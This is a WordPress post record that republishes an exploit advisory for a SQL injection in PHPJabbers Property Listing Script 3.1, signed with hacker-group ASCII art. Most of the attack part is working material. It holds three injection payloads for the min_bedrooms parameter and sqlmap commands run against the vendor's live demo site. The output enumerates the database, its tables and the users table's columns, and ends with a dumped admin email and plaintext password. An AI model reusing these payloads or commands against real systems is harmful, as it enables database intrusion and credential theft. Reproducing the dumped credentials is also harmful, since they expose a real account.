{"id":27201,"date":"2022-07-18T21:20:03","date_gmt":"2022-07-18T17:20:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167757\/pls31-sql.txt"},"modified":"2022-07-20T08:52:02","modified_gmt":"2022-07-20T04:22:02","slug":"property-listing-script-3-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/property-listing-script-3-1-sql-injection\/","title":{"rendered":"Property Listing Script 3.1 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br \/>\n\u2502\u2502 C r a C k E r \u250c\u2518<br \/>\n\u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n<p dir=\"ltr\">\u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack&#8230;. \u2500\u2500\u2500\u2500\u2510<br \/>\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br \/>\n\u250c\u2518 [ Exploits ] \u250c\u2518<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<br \/>\n: Author : CraCkEr \u2502 \u2502 :<br \/>\n\u2502 Website : phpjabbers.com \u2502 \u2502 \u2502<br \/>\n\u2502 Vendor : PHPJABBERS \u2502 \u2502 Property Listing Script \u2502<br \/>\n\u2502 Software : Property Listing Script 3.1 \u2502 \u2502 \u2502<br \/>\n\u2502 Vuln Type: Remote SQL Injection \u2502 \u2502 Script will give you \u2502<br \/>\n\u2502 Method : GET \u2502 \u2502 the tools to efficiently manage \u2502<br \/>\n\u2502 Critical : High [\u2591\u2591\u2592\u2592\u2593\u2593\u2588\u2588] \u2502 \u2502 your own real estate portal \u2502<br \/>\n\u2502 Impact : Database Access \u2502 \u2502 \u2502<br \/>\n\u2502 \u2502 \u2502 \u2502<br \/>\n\u2502 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502<br \/>\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<br \/>\n: :<br \/>\n\u2502 Release Notes: \u2502<br \/>\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502<br \/>\n\u2502 Typically used for remotely exploitable vulnerabilities that can lead to \u2502<br \/>\n\u2502 system compromise. \u2502<br \/>\n\u2502 \u2502<br \/>\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br \/>\n\u250c\u2518 \u250c\u2518<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n<p dir=\"ltr\">Greets:<br \/>\nPhr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br \/>\nloool, DevS, Dark-Gost<br \/>\nCryptoJob (Twitter) twitter.com\/CryptozJob<br \/>\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br \/>\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n<p dir=\"ltr\">Live Demo Site:<\/p>\n<p dir=\"ltr\">https:\/\/www.phpjabbers.com\/property-listing-script\/#sectionDemo<\/p>\n<p dir=\"ltr\">[INFO] GET parameter &#8216;min_bedrooms&#8217; appears to be &#8216;MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)&#8217; injectable<br \/>\nGET parameter &#8216;min_bedrooms&#8217; is vulnerable.<\/p>\n<p dir=\"ltr\">sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:<\/p>\n<p dir=\"ltr\">&#8212;<br \/>\nParameter: min_bedrooms (GET)<br \/>\nType: boolean-based blind<br \/>\nTitle: AND boolean-based blind &#8211; WHERE or HAVING clause<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND 7719=7719 AND (2759=2759<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.6 AND error-based &#8211; WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">sqlmap.py -u &#8220;https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1&#8221; &#8211;current-db &#8211;batch &#8211;random-agent &#8211;threads 5<\/p>\n<p dir=\"ltr\">[INFO] the back-end DBMS is MySQL<br \/>\nweb server operating system: Linux CentOS 6<br \/>\nweb application technology: Apache 2.2.15<br \/>\nback-end DBMS: MySQL &gt;= 5.6<br \/>\n[01:13:36] [INFO] fetching current database<br \/>\n[01:13:36] [INFO] retrieved: &#8216;pjabbers_demo_pls&#8217;<br \/>\ncurrent database: &#8216;pjabbers_demo_pls&#8217;<\/p>\n<p dir=\"ltr\">sqlmap.py -u &#8220;https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1&#8221; -D pjabbers_demo_pls &#8211;tables &#8211;batch &#8211;random-agent<\/p>\n<p dir=\"ltr\">&#8212;<br \/>\nParameter: min_bedrooms (GET)<br \/>\nType: boolean-based blind<br \/>\nTitle: AND boolean-based blind &#8211; WHERE or HAVING clause<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND 7719=7719 AND (2759=2759<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.6 AND error-based &#8211; WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">[INFO] the back-end DBMS is MySQL<br \/>\nweb server operating system: Linux CentOS 6<br \/>\nweb application technology: Apache 2.2.15<br \/>\nback-end DBMS: MySQL &gt;= 5.6<br \/>\nDatabase: pjabbers_demo_pls<\/p>\n<p dir=\"ltr\">[66 tables]\n+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+<br \/>\n| 1657528735_303_pls_30_property_listing_features |<br \/>\n| 1657528735_303_pls_30_property_listing_fields |<br \/>\n| 1657528735_303_pls_30_property_listing_multi_lang |<br \/>\n| 1657528735_303_pls_30_property_listing_options |<br \/>\n| 1657528735_303_pls_30_property_listing_passwords |<br \/>\n| 1657528735_303_pls_30_property_listing_payments |<br \/>\n| 1657528735_303_pls_30_property_listing_periods |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_country |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_galleries_set |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_gallery |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_locale_languages |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_locale |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_log_config |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_log |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_one_admin |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_paypal |<br \/>\n| 1657528735_303_pls_30_property_listing_plugin_sms |<br \/>\n| 1657528735_303_pls_30_property_listing_properties_features |<br \/>\n| 1657528735_303_pls_30_property_listing_properties |<br \/>\n| 1657528735_303_pls_30_property_listing_roles |<br \/>\n| 1657528735_303_pls_30_property_listing_types |<br \/>\n| 1657528735_303_pls_30_property_listing_users |<br \/>\n| 1657921261_148_pls_30_property_listing_features |<br \/>\n| 1657921261_148_pls_30_property_listing_fields |<br \/>\n| 1657921261_148_pls_30_property_listing_multi_lang |<br \/>\n| 1657921261_148_pls_30_property_listing_options |<br \/>\n| 1657921261_148_pls_30_property_listing_passwords |<br \/>\n| 1657921261_148_pls_30_property_listing_payments |<br \/>\n| 1657921261_148_pls_30_property_listing_periods |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_country |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_galleries_set |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_gallery |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_locale_languages |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_locale |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_log_config |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_log |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_one_admin |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_paypal |<br \/>\n| 1657921261_148_pls_30_property_listing_plugin_sms |<br \/>\n| 1657921261_148_pls_30_property_listing_properties_features |<br \/>\n| 1657921261_148_pls_30_property_listing_properties |<br \/>\n| 1657921261_148_pls_30_property_listing_roles |<br \/>\n| 1657921261_148_pls_30_property_listing_types |<br \/>\n| 1657921261_148_pls_30_property_listing_users |<br \/>\n| pls_30_property_listing_features |<br \/>\n| pls_30_property_listing_fields |<br \/>\n| pls_30_property_listing_multi_lang |<br \/>\n| pls_30_property_listing_options |<br \/>\n| pls_30_property_listing_passwords |<br \/>\n| pls_30_property_listing_payments |<br \/>\n| pls_30_property_listing_periods |<br \/>\n| pls_30_property_listing_plugin_country |<br \/>\n| pls_30_property_listing_plugin_galleries_set |<br \/>\n| pls_30_property_listing_plugin_gallery |<br \/>\n| pls_30_property_listing_plugin_locale |<br \/>\n| pls_30_property_listing_plugin_locale_languages |<br \/>\n| pls_30_property_listing_plugin_log |<br \/>\n| pls_30_property_listing_plugin_log_config |<br \/>\n| pls_30_property_listing_plugin_one_admin |<br \/>\n| pls_30_property_listing_plugin_paypal |<br \/>\n| pls_30_property_listing_plugin_sms |<br \/>\n| pls_30_property_listing_properties |<br \/>\n| pls_30_property_listing_properties_features |<br \/>\n| pls_30_property_listing_roles |<br \/>\n| pls_30_property_listing_types |<br \/>\n| pls_30_property_listing_users |<br \/>\n+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-+<\/p>\n<p dir=\"ltr\">sqlmap.py -u &#8220;https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1&#8221; -D pjabbers_demo_pls -T pls_30_property_listing_users &#8211;columns &#8211;batch &#8211;random-agent<\/p>\n<p dir=\"ltr\">fetching columns for table &#8216;pls_30_property_listing_users&#8217; in database &#8216;pjabbers_demo_pls&#8217;<\/p>\n<p dir=\"ltr\">Database: pjabbers_demo_pls<br \/>\nTable: pls_30_property_listing_users<\/p>\n<p dir=\"ltr\">[12 columns]\n+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+<br \/>\n| Column | Type |<br \/>\n+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+<br \/>\n| created | datetime |<br \/>\n| email | varchar(255) |<br \/>\n| fax | varchar(255) |<br \/>\n| id | int(10) unsigned |<br \/>\n| ip | varchar(15) |<br \/>\n| is_active | enum(&#8216;T&#8217;,&#8217;F&#8217;) |<br \/>\n| last_login | datetime |<br \/>\n| name | varchar(255) |<br \/>\n| password | blob |<br \/>\n| phone | varchar(255) |<br \/>\n| role_id | int(10) unsigned |<br \/>\n| status | enum(&#8216;T&#8217;,&#8217;F&#8217;) |<br \/>\n+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+<\/p>\n<p dir=\"ltr\">sqlmap.py -u &#8220;https:\/\/demo.phpjabbers.com\/1657921261_148\/preview.php?controller=pjListings&amp;action=pjActionProperties&amp;listing_search=1&amp;min_bedrooms=1&#8221; -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password &#8211;dump &#8211;batch &#8211;random-agent<\/p>\n<p dir=\"ltr\">fetching entries of column(s) &#8217;email,password&#8217; for table &#8216;pls_30_property_listing_users&#8217; in database &#8216;pjabbers_demo_pls&#8217;<\/p>\n<p dir=\"ltr\">Database: pjabbers_demo_pls<br \/>\nTable: pls_30_property_listing_users<\/p>\n<p dir=\"ltr\">[1 entry]\n+&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br \/>\n| email | password |<br \/>\n+&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<br \/>\n| admin@admin.com | P@S13rd |<br \/>\n+&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;-+<\/p>\n<p dir=\"ltr\">[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u2502 C r a C k E r \u250c\u2518 \u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 \u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack&#8230;. \u2500\u2500\u2500\u2500\u2510 \u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2518 [ Exploits ] \u250c\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 : Author &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27201","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27201","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27201"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27201\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}